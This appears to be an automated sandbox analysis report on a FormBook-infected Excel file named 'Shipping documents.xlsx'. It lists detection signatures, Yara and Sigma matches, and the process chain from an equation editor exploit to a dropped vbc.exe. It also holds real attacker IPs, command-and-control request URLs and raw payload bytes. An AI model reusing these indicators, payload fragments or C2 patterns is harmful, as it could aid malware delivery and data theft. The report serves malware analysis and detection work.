Play interactive tour

Edit tour

Analysis Report Shipping documents.xlsx

Overview

General Information

Sample Name:	Shipping documents.xlsx
Analysis ID:	323357
MD5:	c3524b3b21dae7ebf0d9ed6b6c10f5ec
SHA1:	72ebb819703693105a86d206a119f88821c84b54
SHA256:	aa610173afefde94cf914948a54de1d63b71475cdd0d9bb18e6f01d67a2076a9
Tags:	DHLVelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2376 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 532 cmdline: 'C:\Users\Public\vbc.exe' MD5: FD09F4D0B2373B9634F2D8AD2F5C899D)

vbc.exe (PID: 2828 cmdline: {path} MD5: FD09F4D0B2373B9634F2D8AD2F5C899D)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

ipconfig.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)

cmd.exe (PID: 2956 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10ac8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10e62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cb75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c661:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cc77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cdef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1187a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b8dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x125f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21c67:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22d0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1eb99:$sqlite3step: 68 34 1C 7B E1 0x1ecac:$sqlite3step: 68 34 1C 7B E1 0x1ebc8:$sqlite3text: 68 38 2A 90 C5 0x1eced:$sqlite3text: 68 38 2A 90 C5 0x1ebdb:$sqlite3blob: 68 53 D8 7F 8C 0x1ed03:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2136150916.0000000002554000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7aa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x885a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x128bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x95d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18c47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19cea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15b79:$sqlite3step: 68 34 1C 7B E1 0x15c8c:$sqlite3step: 68 34 1C 7B E1 0x15ba8:$sqlite3text: 68 38 2A 90 C5 0x15ccd:$sqlite3text: 68 38 2A 90 C5 0x15bbb:$sqlite3blob: 68 53 D8 7F 8C 0x15ce3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 532

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 216.170.126.121, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 29%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: Shipping documents.xlsx

ReversingLabs: Detection: 33%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: 5.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 004948FDh	4_2_00494879
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 004948FDh	4_2_00494888
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	5_2_00406AA1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop ebx	7_2_00086AA1

Source: global traffic

DNS query: name: www.nziyade.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 216.170.126.121:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 216.170.126.121:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.22:49170

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 20:13:00 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Thu, 26 Nov 2020 08:44:44 GMTETag: "74e00-5b4fe8e3ad860"Accept-Ranges: bytesContent-Length: 478720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 6a bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 44 07 00 00 08 00 00 00 00 00 00 8e 62 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 62 07 00 4f 00 00 00 00 80 07 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 42 07 00 00 20 00 00 00 44 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 80 07 00 00 06 00 00 00 46 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 4c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 62 07 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 72 00 00 9c 63 00 00 03 00 00 00 78 00 00 06 4c d6 00 00 f0 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 47 00 00 00 01 00 00 11 02 14 7d 03 00 00 04 02 28 15 00 00 0a 00 00 02 28 06 00 00 06 00 02 73 1d 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 02 6f 18 00 00 06 00 28 16 00 00 0a 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 6f 1c 00 00 06 00 2a 00 13 30 02 00 c8 00 00 00 02 00 00 11 00 28 17 00 00 0a 02 7b 01 00 00 04 7b 0e 00 00 04 28 18 00 00 0a 0a 12 00 28 19 00 00 0a 7e 10 00 00 04 76 6c fe 02 0b 07 2c 11 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 02 7b 01 00 00 04 7b 0f 00 00 04 04 6f 1b 00 00 0a 6f 1c 00 00 0a 00 02 7b 01 00 00 04 28 17 00 00 0a 7d 0e 00 00 04 04 6f 1b 00 00 0a 1f 0d 33 15 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1d 00 00 0a 16 fe 02 2b 01 16 0c 08 2c 40 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1e 00 00 0a 73 1f 00 00 0a 0d 02 7b 01 00 00 04 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1b 00 00 06 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 00 2

Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.nziyade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.coloringprintouts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.ktproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
